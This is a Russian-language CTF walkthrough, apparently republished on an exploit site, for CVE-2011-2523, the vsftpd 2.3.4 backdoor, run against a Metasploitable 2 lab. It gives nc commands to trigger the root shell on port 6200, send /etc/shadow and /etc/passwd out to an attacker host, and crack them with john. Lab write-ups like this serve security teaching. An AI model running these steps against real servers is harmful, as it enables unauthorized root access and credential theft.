Sploitus

Exploit for CTF

kitploit · 2026-08-25

Exploit Code

MARKDOWN97 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-XIANGSI-HOWARD-CTF---CVE-2011-2523
# Сценарий «Захват флага» - CVE-2011-2523

Захватите расшифрованный файл `/etc/shadow` и `/etc/passwd` с уязвимого сервера Metasploitable 2.

# Настройка окружения

## Шаг 1: Загрузите и распакуйте виртуальную машину

Для этого CTF мы используем VMware Workstation Pro с двумя виртуальными машинами. Kali Linux выступает в роли машины атакующего, а Metasploitable 2 — в роли уязвимой машины.

  * Загрузите и установите VMware Workstation: https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html
  * Загрузите и извлеките виртуальную машину Kali Linux: https://www.kali.org/get-kali/
  * Загрузите и извлеките виртуальную машину Metasploitable 2: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/



## Шаг 2: Откройте виртуальные машины Kali Linux и Metasploitable 2 в VMware из извлечённого файла

  * Выберите пункт `Open a Virtual Machine` в VMware Workstation и укажите распакованный файл Kali Linux
  * Щёлкните правой кнопкой мыши по боковой панели и выберите пункт `open`, затем укажите распакованный файл Metasploitable 2
  * Нажмите кнопку `Play virtual machine` на обеих виртуальных машинах
  * Когда появится запрос выбрать вариант `I moved It` или `I copied It`, выберите `I copied It`



## Шаг 3: Вход

  * Войдите в Kali Linux, используя `kali` в качестве имени пользователя и пароля
  * Войдите в Metasploitable, используя `msfadmin` в качестве имени пользователя и пароля



## Шаг 4: Запишите IP-адрес виртуальной машины Metasploitable

  * Выполните `ip addr show` и запишите IP-адрес из раздела `inet`



# Решение

Massachusetts Institute of Technology Research and Engineering описывает CVE-2011-2523 как распространённую уязвимость, при которой `vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp`.

## Шаг 1: Найдите открытые порты на машине Metasploitable с помощью службы FTP

  * `nmap <vulnerable-machine-ip-address>`
  * сканирование nmap должно показать открытый порт 21, использующий службу ftp



## Шаг 2: Попробуйте подключиться к открытому порту с помощью NetCat

  * `nc <vulnerable-machine-ip-address> 21`
  * Имя пользователя — любая строка с `:)` на конце, введите `user <string>:)`
  * Когда появится запрос пароля, введите любую строку `pass <string>`
  * Затем завершите соединение с помощью ^C [CTRL + C] — на порту 6200 открывается оболочка с root-доступом к Metasploitable.



## Шаг 3: Подключитесь к оболочке на порту 6200 уязвимой машины

  * ` nc -v <vulnerable-machine-ip-address> 6200`
  * Покажите IP-адрес текущего соединения: `ip addr show`
  * Покажите, что предоставлен root-доступ, с помощью `whoami`



## Шаг 4: Скопируйте файлы `/etc/shadow` и `/etc/passwd` в другой файл

  * `cp /etc/shadow shadow.txt`
  * `cp /etc/passwd passwd.txt`



## Шаг 5: Отправьте скопированные файлы на машину Kali Linux с помощью NetCat

  * На машине атакующего найдите IP-адрес в разделе `inet` с помощью команды `ip addr show`
  * Прослушивайте файлы на машине атакующего с помощью `nc -l -p 1234 > shadow.txt`
  * В root-оболочке на Metasploitable выполните `nc -w 3 <destination-ip> 1234 < shadow.txt`
  * Повторите для файла passwd



## Шаг 5: Преобразуйте файл shadow в формат инструмента `John`

  * `unshadow passwd.txt shadow.txt > unshadowed-input`
  * Просмотрите файл с помощью `cat unshadowed-input` — в нём должны храниться имя пользователя и пароль



## Шаг 6: Расшифруйте файл shadow с помощью команды `John` и словаря

  * Используйте словарь `rockyou.txt` для взлома хэшей с помощью john
  * Распакуйте файл словаря в Kali Linux: `sudo gzip -d /usr/share/wordlists/rockyou.txt.gz`
  * Когда появится запрос пароля, используйте пароль администратора по умолчанию для Kali Linux — `kali`
  * Взломайте хэши: `john unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txt`
  * Просмотрите взломанные пароли: `john –show unshadowed-input`